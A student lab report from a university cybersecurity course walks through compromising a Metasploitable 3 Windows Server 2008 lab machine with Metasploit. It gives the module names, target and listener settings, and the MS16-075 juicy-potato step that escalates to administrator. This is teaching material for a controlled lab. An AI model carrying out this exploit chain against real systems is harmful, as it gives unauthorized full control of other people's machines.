Metropolitan Technological University
Network Infrastructure
Cybersecurity
5-B
Windows Privilege Escalation
Jorge Isai Hau Rodriguez
Mtro. Alejandro Concha Uicab
February 27, 2025
Introduction
In this document you will find a series of steps which you can use to make an attack
and privilege escalation to a Windows machine which in this case is a metasexploitable 3
with Windows Server 2008 to which the ports were violated to be able to access first as an
unprivileged user and then as a user with all the privileges to be able to perform everything
that an administrator can do on a computer by means of From the shell
First scan the network to find our victim machine
We enter msfconsole to start the attack
We search within the msfconsole search Manage Engine Central Desktop 9
This one will bring us many exploits but the one we are interested in is number 9
We wrote use 9 to select the exploit
We type options to see the parameters
We configure where we are going to attack set RHOSTS 192.168.56.108
We configure our attacking machine to have communication locally set LHOST
192.168.56.105
We wrote exploit to start the attack
When we enter we realize that we do not have full access to the system, so we
proceed to create a session to use it later by typing background
Select the exploit "exploit/Windows/local/ms16_075_reflection_juicy
This file will help us escalate privileges and breach the system to have full access
We type options to see the parameters and we make sure that we only have to assign
the session and the IP of our attacking machine
We wrote set SESSION 1 to go in with that session
And set LHOST 192.168.56.105 to know where the attack is coming from
We run the exploit and enter the system
We write getuid to check that we are successfully as an administrator user in the
system
We verify by entering the Shell
Conclusion
With this practice I learned to violate a Windows operating system with pentesting
tests that are used only in a controlled way to be able to identify how a hacker can violate a
system with only the IP through one of the active ports, this has an endless number of ways
to enter and each one for different use in this case we were able to perform a privilege
escalation which gives us all the functions to To be able to access the system, it is also
important to know how to protect our devices to avoid this type of attack on our machines
and to know how to carry one in a controlled way in case of being attacked